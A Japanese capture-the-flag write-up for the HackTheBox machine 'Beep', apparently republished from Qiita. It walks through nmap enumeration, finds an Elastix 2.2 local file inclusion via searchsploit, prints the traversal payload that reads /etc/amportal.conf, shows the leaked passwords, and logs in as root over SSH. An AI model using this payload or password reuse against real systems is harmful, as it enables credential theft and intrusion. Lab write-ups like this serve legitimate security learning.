【HackTheBox】Beep - Writeup -

6827 ワード

HackTheBox 脆弱性脆弱性テキストリンク

【HackTheBox】Beep

ポート列挙 (nmap enumeration)

map -T5 --min-rate 10000 10.10.10.7
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
443/tcp  open  https
993/tcp  open  imaps
995/tcp  open  pop3s
3306/tcp open  mysql
4445/tcp open  upnotifyp

基本的なポートがわかったので、-A(詳細オプション)でさらに多くの情報を調べます。

awk '{print $1}' | grep -o '[0-9]\+' | sed -z 's/\n/,/g' | sed 's/.$//g'

以上のコマンドで出てきたポート番号をすらっと整頓できます。

nmap -p 22,25,80,110,111,143,443,993,995,3306,4445 -A 10.10.10.7
22/tcp   open  ssh        OpenSSH 4.3 (protocol 2.0)                                                                                
| ssh-hostkey:                                                                                                                      
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)                                                                      
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)                                                                      
25/tcp   open  smtp       Postfix smtpd                           
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp   open  http       Apache httpd 2.2.3                      
|_http-server-header: Apache/2.2.3 (CentOS)                       
|_http-title: Did not follow redirect to https://10.10.10.7/                                                                        
|_https-redirect: ERROR: Script execution failed (use -d to debug)                                                                  
110/tcp  open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4                                                              
|_pop3-capabilities: EXPIRE(NEVER) AUTH-RESP-CODE LOGIN-DELAY(0) APOP IMPLEMENTATION(Cyrus POP3 server v2) TOP USER RESP-CODES UIDL STLS PIPELINING
111/tcp  open  rpcbind    2 (RPC #100000)                         
143/tcp  open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4                                                              
|_imap-capabilities: RENAME THREAD=REFERENCES RIGHTS=kxte Completed URLAUTHA0001 X-NETSCAPE QUOTA CONDSTORE LIST-SUBSCRIBED LISTEXT ACL CATENATE STARTTLS IMAP4rev1 ANNOTATEMORE THREAD=ORDEREDSUBJECT MULTIAPPEND OK ID UNSELECT SORT BINARY MAILBOX-REFERRALS UIDPLUS CHILDREN IMAP4 LITERAL+ ATOMIC NO SORT=MODSEQ NAMESPACE IDLE      
443/tcp  open  ssl/https?                                         
|_ssl-date: 2020-07-11T10:55:40+00:00; +17s from scanner time.                                                                      
993/tcp  open  ssl/imap   Cyrus imapd                             
|_imap-capabilities: CAPABILITY                                   
995/tcp  open  pop3s?                                             
3306/tcp open  mysql      MySQL (unauthorized)                                                                                      
4445/tcp open  upnotifyp?

予想

smtp->imapとpop3があるので、メールサーバーがある。
http/httpsのウェブサイトがある。
sshでウェブサイト管理をしている模様。
mysqlで何らかのデータを管理している。

Web

Elastixというサービスをホストしているウェブサイトであった。

---Elastix ---
Elastixは、IP PBX、電子メール、IM、FAX、およびコラボレーション機能を統合する統合コミュニケーションサーバーソフトウェアです。 Webインターフェイスがあり、予測ダイヤル機能を備えたコールセンターソフトウェアなどの機能が含まれています。

というわけで、色々なサービスが稼働していたわけみたい。

よくみてみると、2011年題のファイルアップロードが多いので、バージョンを調べる。

• 2011-11-05: Distribution Release: Elastix 2.2

#searchspoloitで脆弱性のあるソフトウェアを調べる
searchsploit elastix

Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl
#スクリプトの中身から取り出した攻撃コード
\#/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

---LFI---
ローカルファイルインクルードは、外部ファイルの読み込みではなく
サーバー内のファイルを不正に読み込んだり、意図しない動作を起こして脆弱性を発生させたりします。

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

ブラウザでコード注入ぅう！

ページソースを見る｜view-source:https://*
とすると、整頓されたコードがみれてみやすくなります。

AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

使えそうななユーザーは admin:jEhdIekWmdjE
ハッシュタグ#でコメントアウトされてないので、現行ユーザの可能性。

ログイン成功。

しかし、リバースシェルをアップロードする場所がなかったのでsshで試してみる。

SSH

ユーザーはadminで最初試したが、失敗したのでrootでログインしてみる。

➜  ~ ssh [email protected]
[email protected]'s password: 
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# ls
anaconda-ks.cfg        install.log         postnochroot  webmin-1.570-1.noarch.rpm
elastix-pr-2.2-1.i386.rpm  install.log.syslog  root.txt
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# whoami
root
[root@beep ~]#

まとめ

LFI (Local File Inclusion)脆弱性についての実践が出来た。
searchsploitでの脆弱性を調べる手順（バージョン確認->SearchSploit )

Author And Source

この問題について(【HackTheBox】Beep - Writeup -), 我々は、より多くの情報をここで見つけました https://qiita.com/mr-wacker/items/21d68f183641ca35186f

著者帰属：元の著者の情報は、元のURLに含まれています。著作権は原作者に属する。

Content is automatically searched and collected through network algorithms . If there is a violation . Please contact us . We will adjust (correct author information ,or delete content ) as soon as possible .